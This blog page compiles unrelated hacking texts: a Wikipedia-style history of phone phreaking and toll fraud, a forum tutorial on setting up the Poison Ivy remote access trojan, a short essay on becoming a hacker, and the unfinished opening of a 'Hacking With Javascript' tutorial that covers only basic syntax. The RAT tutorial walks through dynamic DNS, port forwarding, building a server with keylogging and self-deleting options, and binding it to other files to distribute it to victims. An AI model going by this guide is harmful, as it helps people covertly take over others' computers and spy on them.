petak, 8. travnja 2011.

Phreaking

Phreaking is a slang term coined to describe the activity of a subculture of people who study, experiment with, or explore telecommunication systems, such as equipment and systems connected to public telephone networks. As telephone networks have become computerized, phreaking has become closely linked with computer hacking.[1] This is sometimes called the H/P culture (with H standing for hacking and P standing for phreaking).
The term phreak is a portmanteau of the words phone and freak, and may also refer to the use of various audio frequencies to manipulate a phone system. Phreak, phreaker, or phone phreak are names used for and by individuals who participate in phreaking. A large percentage of the phone Phreaks were blind.[2][3] Because identities were usually masked, an exact percentage cannot be calculated.

Contents

[hide]

[edit] History

[edit] Switch hook and tone dialer

Possibly one of the first phreaking methods was switch-hooking. It is considered softcore[citation needed] because it has almost negligible toll fraud potential. Nevertheless it allows placing calls from a phone where the rotary dial or keypad has been disabled by a key lock or other means to prevent unuthorized calls from that phone. It is done by rapidly pressing and releasing the switch hook to open and close the subscriber circuit, simulating the pulses generated by the rotary dial. Even most current telephone exchanges support this method[citation needed], as they need to be backward compatible with old subscriber hardware.
By rapidly clicking the hook for a variable number of times at roughly 5 to 10 clicks per second, and then keeping intervals of roughly one second, the caller can dial numbers as if they were using the rotary dial. The pulse counter in the exchange counts the pulses or clicks and interprets them in two possible ways. Depending on continent and country, one click with a following interval can be either "one" or "zero" and subsequent clicks before the interval are additively counted. This renders ten consecutive clicks being either "zero" or "nine", respectively. Some exchanges allow using additional clicks for special controls, but numbers 0-9 now fall in one of these two standards. One special code, "flash", is a very short single click, possible but hard to simulate. Back in the day of rotary dial, very often technically identical phone sets were marketed in multiple areas of the world, only with plugs matched by country and the dials being bezeled with the local standard numbers.
Such key-locked telephones, if wired to a modern DTMF capable exchange, can also be exploited by a tone dialer that generates the DTMF tones used by modern keypad units. These signals are now very uniformly standardized worldwide, and along with rotary dialing, they are almost all that is left of in-band signaling. It is notable that the two methods can be combined: Even if the exchange does not support DTMF, the key lock can be circumvented by switch-hooking, and the tone dialer can be then used to operate automated DTMF controlled services that can't be used with rotary dial.

[edit] 2600 hertz

The precise origins of phone phreaking are unknown, although it is believed[who?] that phreak-like experimentation began with widespread deployment of automatic switches on the telephone networks. In the United States, AT&T began introducing automatic switches for long distance and certain forms of trunking carriers in the mid-to-late 1950s. With the introduction of these switches, the general population began, for the first time, to interact with computing power on a large scale. Phreaking can be viewed as an extension of this, where individuals interested in computers and technology, yet unable to further that interest for a variety of reasons, turned to the only available option: the computer controlled telephone network.[original research?]
AT&T's fully automatic switches use tone dialing, a form of in-band signaling, and include some tones which are for internal telephone company use. One internal use tone is a tone of 2600 Hz which causes a telephone switch to think the call was over, and could be exploited to provide free long-distance and international calls.[4]
The tone was discovered in approximately 1957,[4] by Joe Engressia, a blind seven-year old boy. Engressia was skilled with perfect pitch, and discovered that whistling the fourth E above middle C (a frequency of 2600 Hz) would stop a dialed phone recording. Unaware of what he had done, Engressia called the phone company and asked why the recordings had stopped. This was the beginning of his love of exploring the telephone system.[4]
Other early phreaks, such as "Bill from New York", began to develop a rudimentary understanding of how phone networks worked. Bill discovered that a recorder he owned could also play the tone at 2600 Hz with the same effect. John Draper discovered through his friendship with Engressia that the free whistles given out in Cap'n Crunch cereal boxes also produced a 2600 Hz tone when blown (providing his nickname, "Captain Crunch"). This allowed control of phone systems that worked on single frequency (SF) controls. One could sound a long whistle to reset the line, followed by groups of whistles (a short tone for a "1", two for a "2", etc.) to dial numbers.

[edit] Multi frequency

While single frequency worked on certain phone routes, the most common signaling on the then long distance network was multi-frequency (MF) controls. The slang term for these tones and their use was "Marty Freeman." The specific frequencies required were unknown until 1964, when Bell Systems published the information in the Bell System Technical Journal in an article describing the methods and frequencies used for interoffice signalling. The journal was intended for the company's engineers; however, it found its way to various college campuses across the United States. With this one article, the Bell System accidentally gave away the "keys to the kingdom," and the intricacies of the phone system were at the disposal of anyone with a cursory knowledge of electronics.[citation needed]
The second generation of phreaks arose at this time, including the New Yorkers "Evan Doorbell", "Ben Decibel" and Neil R. Bell and Californians Mark Bernay, Chris Bernay, and "Alan from Canada". Each conducted their own independent exploration and experimentation of the telephone network, initially on an individual basis, and later within groups as they discovered each other in their travels. "Evan Doorbell," "Ben" and "Neil" formed a group of phreaks known as Group Bell. Mark Bernay initiated a similar group named the Mark Bernay Society. Both Mark and Evan received fame amongst today's phone phreakers for Internet publication of their collection of telephone exploration recordings. These recordings, conducted in the 60s, 70s, and early 80s are available at Mark's website Phone Trips.[5]

[edit] Blue boxes

In October 1971, phreaking was introduced to the masses when Esquire Magazine published a story called "Secrets of the Little Blue Box"[6] by Ron Rosenbaum. This article featured Engressia and John Draper prominently, synonymising their names with phreaking. The article also attracted the interest of other soon-to-be phreaks, such as Steve Wozniak and Steve Jobs, who went on to found Apple Computer.[7]
1971 also saw the beginnings of YIPL (Youth International Party Line), a publication started by Abbie Hoffman and Al Bell to provide information to Yippies on how to "beat the man," mostly involving telephones. In 1973, Al Bell would move YIPL over and start TAP (Technological American Party[8]). TAP would develop into a major source for subversive technical information among phreaks and hackers all over the world. TAP ran from 1973 to 1984, with Al Bell handing over the magazine to "Tom Edison" in the late 70's. TAP ended publication in 1984 due mostly to a break-in and arson at Tom Edison's residence in 1983.[9] Cheshire Catalyst then took over running the magazine for its final (1984) year.
A controversially suppressed article "How to Build a 'Phone Phreaks' box" in Ramparts Magazine (June, 1972) touched off a firestorm of interest in phreaking. This article published simple schematic plans of a "black box" used to receive free long distance phone calls, and included a very short parts list that could be used to construct one. Bell sued Ramparts which forced the magazine to pull all copies from shelves, but not before numerous copies were sold and many regular subscribers received them.

[edit] Computer hacking

In the 1980s, the revolution of the personal computer and the popularity of computer bulletin board systems (accessed via modem) created an influx of tech-savvy users. These BBSes became popular for computer hackers and others interested in the technology, and served as a medium for previously scattered independent phone phreaks to share their discoveries and experiments. This not only led to unprecedented collaboration between phone phreaks, but also spread the notion of phreaking to others who took it upon themselves to study, experiment with, or exploit the telephone system. This was also at a time when the telephone company was a popular subject of discussion in the US, as the monopoly AT&T was forced into divestiture. During this time, phreaking lost its label for being the exploration of the telephone network, and began to focus more on toll fraud. Computer hackers began to use phreaking methods to find the telephone numbers for modems belonging to businesses, which they could later exploit. Groups then formed around the BBS hacker/phreaking (H/P) community such as the famous Masters of Deception (Phiber Optik) and Legion of Doom (Erik Bloodaxe) groups. In 1985 an underground e-zine called Phrack (a combination of the words Phreak and Hack) began circulation among BBSes, and focused on hacking, phreaking, and other related technological subjects.
In the early 1990s H/P groups like Masters of Deception and Legion of Doom were shut down by the US Secret Service's Operation Sundevil. Phreaking as a subculture saw a brief dispersion in fear of criminal prosecution in the 1990s, before the popularity of the internet initiated a reemergence of phreaking as a subculture in the US and spread phreaking to international levels.
Into the turn of the 21st century, phreaks began to focus on the exploration and playing with the network, and the concept of toll fraud became widely frowned on among serious phreakers, primarily under the influence of the website Phone Trips, put up by second generation phreaks Mark Bernay and Evan Doorbell.

[edit] Toll fraud

The 1984 AT&T breakup gave rise to many small companies intent upon competing in the long distance market. These included the then-fledgling Sprint and MCI, both of whom had only recently entered the marketplace. At the time, there was no way to switch a phone line to have calls automatically carried by non-AT&T companies. Customers of these small long distance operations would be required to dial a local access number, enter their calling card number, and finally enter the area code and phone number they wish to call. Because of the relatively lengthy process for customers to complete a call, the companies kept the calling card numbers short – usually 6 or 7 digits. This opened up a huge vulnerability to phone phreaks with a computer.
6-digit calling card numbers only offer 1 million combinations. 7-digit numbers offer just 10 million. If a company had 10,000 customers, a person attempting to "guess" a card number would have a good chance of doing so correctly once every 100 tries for a 6-digit card and once every 1000 tries for a 7-digit card. While this is almost easy enough for people to do manually, computers made the task far easier. "Code hack" programs were developed for computers with modems. The modems would dial the long distance access number, enter a random calling card number (of the proper number of digits), and attempt to complete a call to a computer bulletin board system (BBS). If the computer connected successfully to the BBS, it proved that it had found a working card number, and it saved that number to disk. If it did not connect to the BBS in a specified amount of time (usually 30 or 60 seconds), it would hang up and try a different code. Using this methodology, code hacking programs would turn up hundreds (or in some cases thousands) of working calling card numbers per day. These would subsequently be shared amongst fellow phreakers.
There was no way for these small phone companies to identify the culprits of these hacks. They had no access to local phone company records of calls into their access numbers, and even if they had access, obtaining such records would be prohibitively expensive and time-consuming. While there was some advancement in tracking down these code hackers in the early 1990s, the problem did not completely disappear until most long distance companies were able to offer standard 1+ dialing without the use of an access number.

[edit] Diverters

Another method of obtaining free phone calls involved the use of so-called "diverters". Call forwarding was not an available feature for many business phone lines in the 1980s and early 1990s, so they were forced to buy equipment that could do the job manually between two phone lines. When the business would close, they would program the call diverting equipment to answer all calls, pick up another phone line, call their answering service, and bridge the two lines together. This gave the appearance to the caller that they were directly forwarded to the company's answering service. The switching equipment would typically reset the line after the call had hung up and timed out back to dial tone, so the caller could simply wait after the answering service had disconnected, and would eventually get a usable dial tone from the second line. Phreakers recognized the opportunity this provided, and they would spend hours manually dialing businesses after hours, attempting to identify faulty diverters. Once a phreaker had access to one of these lines, he could use it for one of many purposes. In addition to completing phone calls anywhere in the world at the business' expense, they could also dial 1-900 phone sex/entertainment numbers, as well as use the phone line to harass their enemies without fear of being traced. Victimized small businesses were usually required to foot the bill for the long distance calls, as it was their own private equipment (not phone company security flaws) that allowed such fraud to occur. By 1993, call forwarding was offered to nearly every business line subscriber, making these diverters obsolete. As a result, hackers stopped searching for the few remaining ones, and this method of toll fraud died.

[edit] Voice mail boxes and bridges

Prior to the BBS era of the 1980s phone phreaking was more of a solitary venture as it was difficult for phreaks to connect with one another. In addition to communicating over BBSs phone phreaks discovered voice mail boxes and party lines as ways to network and keep in touch over the telephone. It was rare for a phone phreak to legally purchase access to voice mail. Instead, they usually would appropriate unused boxes that were part of business or cellular phone systems. Once a vulnerable mailbox system was discovered, word would spread around the phreak community, and scores of them would take residence on the system. They would use the system as a "home base" for communication with one another until the rightful owners would discover the intrusion and wipe them off. Voice mailboxes also provided a safe phone number for phreaks to give out to one another as home phone numbers would allow the phreak's identity (and home address) to be discovered. This was especially important given that phone phreaks were breaking the law.
Phreakers also used "bridges" to communicate live with one another. The term "bridge" originally referred to a group of telephone company test lines that were bridged together giving the effect of a party-line. Eventually, all party-lines, whether bridges or not, came to be known as bridges if primarily populated by hackers and/or phreakers.
The popularity of the Internet in the mid-1990s, along with the better awareness of voice mail by business and cell phone owners, made the practice of stealing voice mailboxes less popular. To this day bridges are still very popular with phreakers yet, with the advent of VoIP, the use of telephone company owned bridges has decreased slightly in favor of phreaker-owned conferences.

[edit] Cell phones

By the late 1990s, the fraudulent aspect of phreaking all but vanished. Most cellular phones offered unlimited domestic long distance calling for the price of standard airtime (often totally unlimited on weekends), and flat-rate long-distance plans appeared offering unlimited home phone long distance for as little as $25 per month. International calling could be made very cheaply, as well. Between the much higher risk of being caught (due to advances in technology) and the much lower gain of making free phone calls, toll fraud started to become a concept associated very little with phreaking.

[edit] End of multi-frequency

The end of multi-frequency (MF) phreaking in the lower 48 United States occurred on June 15, 2006, when the last exchange in the continental United States to use a "phreakable" MF-signalled trunk replaced the aging (yet still well kept) N2 carrier with a T1 carrier. This exchange, located in Wawina Township, Minnesota, was run by the Northern Telephone Company of Minnesota. Many phone phreaks from across North America and the world made calls into what was the last group of MF-able inward trunks in the continental United States. A message board was set up for Paul Revere on +1 (218) 488-1307, for phone phreaks across the world to "say their goodbyes" to MF signalling and the N2 in Wawina.
During the days prior to the cutover, many famous phone phreaks such as Mark Bernay, Joybubbles, Bob Bernay, and Captain Crunch could be heard leaving their comments on the message board. The official date for the cutover from N2 to T-carrier was Wednesday, June 14. As early as June 7, there was a noticeable static on what had previously been clear lines. By Monday, June 12, many numbers were unreachable, and the static had peaked. The recording on +1 (218) 488-1307 was generally inaccessible, and MFing through the switch was becoming increasingly difficult due to the increased static. On June 15, at around 1:40 am, Eastern Daylight Time, any new incoming calls were unreachable}. As of July 20, 2010, the message played at +1 (218) 488-1307 was simply the current time for Wawina, Minnesota.[10]

[edit] 2600 Hz

In the original analog networks, short-distance telephone calls were completed by sending relatively high-power electrical signals through the wires to the end office, which then switched the call. This technique could not be used for long-distance connections, because the signals would be filtered out due to capacitance in the wires. Long-distance switching remained a manual operation years after short-distance calls were automated, requiring operators at either end of the line to set up the connections.
Bell automated this process by sending "in-band" signals. Since the one thing the long-distance trunks were definitely able to do was send voice-frequency signals, the Bell system used a selection of tones sent over the trunks to control the system. When calling long-distance, the local end-office switch would first route the call to a special switch (this is why it is necessary to dial "1" in North America or "0" in most of Europe for long-distance calls) which would then convert further dialing into tones and send them over an appropriately selected trunk line (selected with the area code). A similar machine at the far end of the trunk would decode the tones back into electrical signals, and the call would complete as normal.
In addition to dialing instructions, the system also included a number of other tones that represented various commands or status. 2600 Hz, the key to early phreaking, was the frequency of the tone sent by the long-distance switch indicating that the user has gone on-hook (hung up the phone). This normally resulted in the remote switch also going on-hook, freeing the trunk for other uses. In order to make free lines easy to find, the 2600 Hz tone was continually played into free trunks. Engressia's whistling had triggered the remote switch to go on-hook, but critically, the local switch knew he was still off-hook because that was signaled electrically. The system was now in an inconsistent state, leaving him connected to an operational long-distance trunk line. With further experimentation, the phreaks learned the rest of the signals needed to dial on the remote switch.
Normally long-distance calls are billed locally. Since the "trick" required a long distance call to be placed in order to connect to the remote switch, it would be billed like normal. However there are a class of calls that have either no billing, like calls to directory service, or reverse the billing, like WATS lines (1-800 numbers). By dialing one of these numbers the user was connected to a remote switch as normal, but no billing record was made locally. A number of people in the 1960s discovered a loophole that resulted from this combination of features that allowed free long distance calls to be made. First you would dial a toll-free number in the area code you wanted to connect to, then play the 2600 Hz tone into the line to return the remote switch to on-hook, and then use a blue box to dial the number you wanted to connect to. The local Bell office would have no record of the call.
As knowledge of phreaking spread, a minor culture emerged from the increasing number of phone phreaks. Sympathetic (or easily social-engineered) telephone company employees began to provide the various routing codes to use international satellites and trunk lines. At the time it was felt that there was nothing Bell could do to stop this. Their entire network was based on this system, so changing the system in order to stop the phreakers would require a massive infrastructure upgrade.
In fact, Bell responded fairly quickly, but in a more targeted fashion. Looking on local records for inordinately long calls to directory service or other hints that phreakers were using a particular switch, filters could then be installed to block efforts at that end office. Many phreakers were forced to use pay telephones as the telephone company technicians regularly tracked long-distance toll free calls in an elaborate cat-and-mouse game. AT&T instead turned to the law for help, and a number of phreaks were caught by the government.
Eventually, the phone companies in North America did, in fact, replace all their hardware. They didn't do it to stop the phreaks, but simply as a matter of course while moving to fully digital switching systems. Unlike the crossbar, where the switching signals and voice were carried on the same lines, the new systems used separate lines for signalling that the phreaks couldn't get to. This system is known as Common Channel Interoffice Signaling. Classic phreaking with the 2600 Hz tone continued to work in more remote locations into the 1980s, but was of little use in North America by the 1990s.

[edit] Famous phone phreaks

RAT Tutorial - Poison Ivy

Note: I am not responsible for anything you do, ever. You are. I am posting this because I am very interested in RATs and coding my own. You alone are solely responsible of your actions, intentions, and accept so by reading the following. Intended for education purposes relating to any and all of the content below. It must be stressed that the poster is in no way to be held responsible for anything resulting from the addition of the below to your knowledge, or anything resulting from such an addition.

Note: This tutorial was writen by me and you are free to repost this as you please as long as you give full credit to me. You are in no way entitled to steal/copy my work without giving credit to me. but now i dont really care

Requirements:
---------------------------------
no-ip.biz account (see below for instructions)
RAT of your choice, I will be showing Poison Ivy
No-IP client
Know how to port forward (people behind routers only)
---------------------------------

Intro to RATs
---------------------------------
So here we go. I'm going to show you how to setup a RAT. A RAT can stand for a few things:
Remote Administration Tool
Remote Access Tool
Remote Access Trojan
Remote Administration Trojan
and probably more.
In any event, it doesn't matter. What you need to know is that it allows you to access the target computer from yours, using the trojan. Now it may help you to look this up on
Code:
wikipedia. http://en.wikipedia.org/wiki/Remote_administration_tool
---------------------------------

No IP
---------------------------------
First of all, go here
Code:
http://www.no-ip.com/newUser.php
and sign up for an account there. After that log into the site with the account you just created and add your new domain. SEE PIC no-ip.png
[attachment=2095]

Now download the dynamic update client from the downloads tab at the top of the no-ip site. Install that when you are done, and you can update your IP for your domain by logging into the client and updating. Pretty easy.
---------------------------------

Port Forwarding
---------------------------------
If you are not behind a router, skip this. If you are, read on.

You should know how to forward ports on your router. If you dont, head to google, and find out. Each router is different. Usually you can type 192.168.1.1 (or your router's IP address for your LAN) in the address bar of your browser. If you got the right LAN IP, a login box will appear, log in. Default is usually admin:password, or something similar. You're on your own here.
When you finally get int, forward port 3460. That's all.
Hulk11 pointed out that admin:admin is commonly used in routers as well.
---------------------------------

Getting the RAT
---------------------------------
Head over to
Code:
http://www.poisonivy-rat.com/index.php?link=download
and download the latest version. At the time of posting it was 2.3.2.
Download that and unzip it.
---------------------------------

Using the RAT
---------------------------------
Open up poison ivy, and click File>New Client. We are going to set up Poison Ivy to listen for connections on the port you forwarded. Default is 3460. Type in a password for your RAT and click start. You will need this password later.

Now File>New Server. Click create profile. Make it look like Server1.png Be sure that the password you put here and the password here match.
[attachment=2092]

Click next and make your server look like Server2.png.

[attachment=2093]
You will need to select Active X and click the random button. Having the server melt is up to you, I wouldn't pick melt when it is bound to another file. When the file is sent by itself, usually choose to melt it. Click next

Make your server look like Server3.png. Ignore the thing about the keylogger making it unstable. Not much else here. Click next.
[attachment=2094]


You can choose an icon here, or use a resource editor like ResHacker to chage it later. After you do that, click Generate at the bottom and save the .EXE somewhere.
---------------------------------

Testing the RAT
---------------------------------
You can run the server on yourself to test it, this is relatively safe because you have the password to connect to it. When you run the server, you should see yourself in the Poison Ivy Connection's tab.
Notice the pop up box from the system try alerting you of a new connection. That's nice. You can see this in Working.png
[attachment=2096]
I have edited out the IP addresses of those not on my LAN as well as their computer user names and such in order to protect them. To connect to a server, double click the entry in the connections tab. Behold! You are in their PC!
---------------------------------

Distributing
---------------------------------
You can distribute the server file by itself, or bind it to other files. This is where you get to do as you please. Get creative!
---------------------------------

Well that is about it. You can use this knowledge with other RATs and such. If this helped you, rep me or whatever. Don't steal my work, and have fun! Keep in mind both "Note:"s at the beginning of this post. Thanks!

Hacking Simplified - For Those Who Want to Learn Things From the Scratch

Hacking Simplified - For Those Who Want to Learn Things From the Scratch

It's quite probable that you have received spam offering a hotmail hacking guide that will give you the basics on how to become a hacker. Although it sounds tempting to have the power to know the private life of other persons, most of these guides and courses are nothing but scams that are looking for new victims.
If you really want to become a hacker, you need to go to the places were they gather: a hacking facebook, a hacker's forum, free hacking tutorials or even a mailing list. The information is out there. You only need to go and find it.

Where Can You Get Material on Hacking and Information on Hacking

There are two main sources. The first one is the Internet. You will have to make a basic query in your favorite search engine with the word hacker and start looking each one of the suggested sites. Most of them will only offer you limited tutorials on how to hack (like the Hacker's Black book or the Happy Hacker book, which are outdated). Other's will give you an useful insight on this world. After some time, you will find forums were people from around the world share their experiences.

Do not expect to enter an easy world. The jargon used by a group of hackers can be quite confusing for any beginner. So don't feel that you will never be part of it. Start with the basics and read "How to become a hacker" from Eric S. Rymond. Although the document is five years old, it will give you an introductory crash course on were do you need to start.

The second source is face to face reunions. Get into the internet and search for any hacker's meeting in your vicinity. You will be surprised to find that they meet quite regularly. Of course, do not expect to find a Matrix kind of reunion. This is serious, professional people that pay their rent by hacking. Drop by and make some questions on hacking tutorials.

What Is The Hackers Bible?

The hacker's bible has two possible sources, depending on whom do you ask. For some people, it is none other but the magazine 2600: The Hacker Quarterly. This magazine was created by Emmanuel Goldstein, and it focuses on aspects of different technologies. For example, it covers telecommunication devices as well as computers.

The magazine gives to its readers grey hacker's material. That means that it gives them information on how to augment the capacities of any electronic apparatus, such as a cell phone. This neutral posture is different to white hacking (were a hacker uses his abilities for a good cause, like detecting the vulnerabilities of a network) and black hacking (were a hacker uses his knowledge for selfish purposes, like creating a hotmail hacking guide).

The other Hacker's Bible is the Jargon File. This document is a glossary of hacker slang that has been collected since 1975, from the old days of the Arpanet (the precursor of the Internet).

Hacking With Javascript


Things to come: example of stealing info from users (anti-virus programs and trojans), story of ciru cookie stealing from acanium, ThePull's javascript exploits, and the about:// exploit.  Since so many people were asking when this tutorial would come out I decided to finally put it up.  I'd appriecated some feedback.  Flames without a reason are not welcome. This tutorial is not completely finished.. and probably never will be :( -idea: cross site scriptting by opening a new page in a frame and then writting to form fields or somehow injecting javascript. Or somehow write the html to the top or bottom.

Intro
Javascript is used as a client side scripting language, meaning that your browser is what interprets it.  It is used on webpages and is secure (for the most part) since it cannot touch any files on your hard drive (besides cookies).  It also cannot read/write any files on the server.  Knowing javascript can help you in both creating dynamic webpages, meaning webpages that change, and hacking.  First I will start with the basic javascript syntax, then I will list a few sites where you can learn more, and then I will list a few ways you can use javascript to hack.
There are a few benifits of knowing javascript.  For starters, it is really the only (fully supported) language that you can use on a website making it a very popular language on the net.  It is very easy to learn and shares common syntax with many other languages. And it is completely open source, if you find something you like done in javascript you can simply view the source of the page and figure out how it's done.  The reason I first got into javascript was because back before I got into hacking I wanted to make my own webpage.  I learned HTML very quickly and saw Dynamic HTML (DHTML) mentioned in a few tutorials.  I then ventured into the land of javascript making simple scripts and usful features to my site.
It was only after I was pretty good with javascript and got into hacking that I slowly saw it's potential to be used milisously.  Many javascript techniques are pretty simple and involve tricking the user into doing something.  Almost pure social engineering with a bit of help from javascript.  After using simple javascript tricks to fake login pages for webbased email I thought about other ways javascript could be used to aid my hacking, I studied it on and off for around a year.  Some of these techniques are used by millions of people, some I came up with an are purely theorectical.  I hope you will realize how much javascript can aid a hacker.
1. Basic Syntax
2. Places To Learn More Advanced Javascript
3. Banner Busting & Killing Frames
4. Getting Past Scripts That Filter Javascript
5. Stealing Cookies
6. Stealing Forms
7. Gaining Info On Users
8. Stories Of Javascript Hacks
9. Conclusion

The basics of javascript are fairly easy if you have programmed anything before, although javascript is not java, if you know java you should have no problems learning it.  Same for any other programming language, as most share the same basics as javascript uses.  This tutorial might not be for the complete newbie.  I would like to be able to do a tutorial like that, but I don't have the time or patience to write one.  To begin if you don't know html you must learn it first!
Javascript starts with the tag <script language="javascript"> and ends with </script>  Anything between these two tags is interpreted as javascript by the browser.  Remember this!  Cause a few hacks use the fact that if you use <script type="javascript"> and don't finish it all the html on the page underneath that is ignored.  You can also use <script type="text/javascript"> and <</script>.. either way is fine.  I would also like to mention that many scripts have <!-- right after the <script type="text/javascript"> tag and //--> right before the </script> tag, this is because they would like to make it compatible with other browsers that do not support javascript.  Again, either way is fine, but I will be using the <!-- and //--> because that is how I learned to script and I got used to putting it in.
Javascript uses the same basic elements as other programming languages.. Such as variables, flow control, and functions.  The only difference is that javascript is a lot more simplified, so anyone with some programming experience can learn javascript very quickly.  The hardest part of scripting javascript is to get it to work in all browsers.  I will now go over the basics of variables:
to define a variable as a number you do: var name = 1;
to define a variable as a string you do: var name = 'value';
A variable is basically the same in all programming languages.  I might also point out that javascript does not support pointers.  No structs to make your own variables either.  Only variable types are defined by 'var'.  This can be a hard thing to understand at first, but javascript is much like C++ in how it handles variables and strings.  A string is a group of characters, like: 'word', which is a string.  When you see something like document.write(something);  it will try to print whatever is in the variable something.  If you do document.write('something');  or document.write("something");  it will print the string 'something'.  Now that you got the variables down lets see how to use arithmetic operators.  This will make 2 variables and add them together to make a new word:
<script type="text/javascript">
<!--
var name = 'b0iler';
var adjective = 'owns';
document.write(name+adjective);
//-->
</script>
first we define the variable 'name' as b0iler, then I define 'adjective' as owns.  Then the document.write() function writes it to the page as 'name'+'adjective' or b0ilerowns.  If we wanted a space we could have did document.write(name+' '+adjective);
Escaping characters - This is an important concept in programming, and extremely important in secure programming for other languages.. javascript doesn't really need to worry about secure programming practice since there is nothing that can be gained on the server from exploitting javascript.  So what is "escaping"?  It is putting a \ in front of certain characters, such as ' and ".  If we wanted to print out:
b0iler's website
We couldn't do:
document.write('b0iler's website');
because the browser would read b0iler and see the ' then stop the string.  We need to add a \ before the ' so that the browser knows to print ' and not interpret it as the ending ' of the string.  So here is how we could print it:
document.write('b0iler\'s website');
There are two types of comments in javascript.  // which only lasts till the end of the line, and /* which goes as many as far as possible until it reaches */ I'll demonstrate:
<script type="text/javascript">
<!--
document.write('this will show up'); // this will not, even document.write('blah'); won't
/* document.write('this also will not show up');
this won't ether. document.write('or this');
it is all in the comments.. which aren't rendered by the browser */
//-->
</script>
The only thing that script will do is print "this will show up".  Everything else is in comments which are not rendered as javascript by the browser.
Flow Control is basically changing what the program does depending on whether something is true or not.  Again, if you have had any previous programming experience this is old stuff.  You can do this a few different ways different ways.  The simplest is the if-then-else statements.  Here is an example:
<script type="text/javascript">
<!--
var name = 'b0iler';
if (name == 'b0iler'){ document.write('b0iler is a really cool guy!'); }
else { document.write('b0iler can not define variables worth a hoot!'); }
//-->
</script>
Lets break this down step by step.  First I create the variable 'name' and define it as b0iler.  Then I check if 'name' is equal to "b0iler" if it is then I write 'b0iler is a really cool guy!', else (if name isn't equal to b0iler) it prints 'b0iler can not define variables worth a hoot!'.  You will notice that I put { and } around the actions after the if and else statements.  You do this so that javascript knows how much to do when it is true.  When I say true think of it this way:
if (name == 'b0iler')
as
if the variable name is equal to 'b0iler'
if the statement name == 'b0iler' is false (name does not equal 'b0iler') then whatever is in the {} (curely brackets) is skipped.
We now run into relational and equality operators.  The relational operators are as follows:
> - Greater than, if the left is greater than the right the statement is true.
< - Less than, if the left is lesser than the right the statement is true.
>= - Greater than or equal to.  If the left is greater than or equal to the right it is true.
<= - Less than or equal to.  If the left is lesser than or equal to the right it is true.
So lets run through a quick example of this, in this example the variable 'lower' is set to 1 and the variable 'higher' is set to 10.  If lower is less than higher then we add 10 to lower, otherwise we messed up assigning the variables (or with the if statement).
<script type="text/javascript">
<!--
var lower = 1;
var higher = 10;
if (lower < higher) { lower = lower + 10; }   //we could have used lower += lower;
document.write('lower should be greater than higher.. or else I messed up.");
document.write('lower:'+lower+' and higher:'+higher);
//-->
</script>
and now the equality operators, you have already seen one of them in an example: if (name == 'b0iler') the equality operators are == for "equal to" and != for "not equal to".  Make sure you always put two equal signs (==) because if you put only one (=) then it will not check for equality.  This is a common mistake that is often overlooked.
Now we will get into loops, loops continue the statements in between the curly brackets {} until they are no longer true. There are 2 main types of loops I will cover: while and for loops.  Here is an example of a while loop:
<script type="text/javascript">
<!--
var name = 'b0iler';
var namenumber = 1;
while (namenumber < 5) {
name = name + name;   // could have used: name += name;
document.write(name);
namenumber = namenumber + 1;
}
//-->
</script>
First 'name' is set to b0iler, then 'namenumber' is set to 1.  Here is where we hit the loop, it is a while loop. What happens is while namenumber is less than 5 it does the following 3 commands inside the brackets {}: name = name + name;   document.write(name);   namenumber = namenumber + 1;   The first statement doubles the length of 'name' by adding itself on to itself.  The second statement prints 'name'.  And the third statement increases 'namenumber' by 1.  So since  'namenumber' goes up 1 each time through the loop, the loop will go through 4 times.  After the 4th time 'namenumber' will be 5, so the statement namenumber < 5 will no longer be true.
Let me quickly go over some short cuts to standard math operators, these shortcuts are:
variable++;   // adds 1 to variable.
variable--;   // subtracts 1 from variable.
variable+= something;   // adds something to variable.  Make sure to use 's if it is a string like:
variable+= 'string';
variable-= 3;   // subtracts 3 from variable
variable*= 2;   // multiples variable by 2.
Next loop is the for loop.  This loop is unique in that it (defines a variable; then checks if a condition is true; and finally changes a variable after each time through the loop).  For the example lets say you want to do the same thing as above.  This is how you would do it with a for loop:
<script type="text/javascript">
<!--
var name = 'b0iler';
for (var namenumber = 1; namenumber < 5; namenumber++) {
name += name;   // this is the same as before: name = name + name;
document.write(name);
}
//-->
</script>
First the variable name is defined, then it starts the for loop.  It assigns 1 to namenumber, then checks if namenumber is less than 5 every time through the loop, and it increases namenumber by 1 every time through the loop (variablename++ means increase the variable by 1).  The next 2 lines are the same as with the while loop.  But since the for loop handles the declaration of namenumber and the increase every time through the loop it makes it simpler for the scripter and easier to keep track of for people trying to read the code.  You can use a while loop if you want, it is all up to the scripter's preference.
Lets go over that for loop one more time, just for clarity.  for (done only the first time; loop continues while this is true; done after every time through the loop)
That's it for learning javascript, this was really basic and pretty much covered things that are constant in most languages.  For javascript specific guides check out the next section of the tutorial. This section was only to give the user enough info to understand the rest of the tutorial.  I wish I could go over more, but there are way better tutorials for advanced javascript then one I could ever write.
I will just provide a list of tutorials and sites with more advanced javascript.  If you wish to learn javascript and be able to write your own you will have to look at other people's scripts for examples and read a few more tutorials.  I just went over the very basics so you wouldn't be lost.
http://hotwired.lycos.com/webmonkey/programming/javascript/tutorials/tutorial2.html - good examples, not really advanced.. prolly a medium level javascript tutorial.
http://www.webdevelopersjournal.com/articles/jsevents2/jsevents2.html - A javascript tutorial on event handles. Fairly advanced.
http://www.htmlguru.com - a classic site, go to the tutorials section and learn a lot of advanced javascript made easy.
http://server1.wsabstract.com/javatutors - Goes over some specific aspects to advanced javascript work.  Useful in many situations.
http://www.pageresource.com/jscript/index6.htm - The advanced string handling and the forms tutorials are good, I would suggest reading them if you wish to get more into javascripting.
Coolnerd's Javascript Resource - A nice list of al the javascript operators, statements, objects.. although it might be alittle old I still use it all the time.
If you want to create your own javascripts for yoursite be warned.  Javascripts are very limited in power, but can be the solution to many simple problems.  You will have to spend a few weeks learning more advanced javascript in order to make anything really useful.  Creating that awsome DHTML (Dynamic HTML) feels really good ;)  Dynamic HTML is pretty much javascript that interacts with the user, css, and layers - <div>, <span>, and <layer>.
Here is some links to good dynamic html sites:
The Dynamic Duo, Cross browser dynamic html tutorial - Goes over things step by step.
Taylor's dynamic HTML tutorial - That nice webmonkey style that everyone loves.
Curious Eye DHTML tutorial - This will really get you going making cross browser Dynamic HTML.
Intro to DHTML - Might be nice if you aren't as html and javascript knowledgable as most DHTML beginners.
Good luck with your adventure into javascript =)

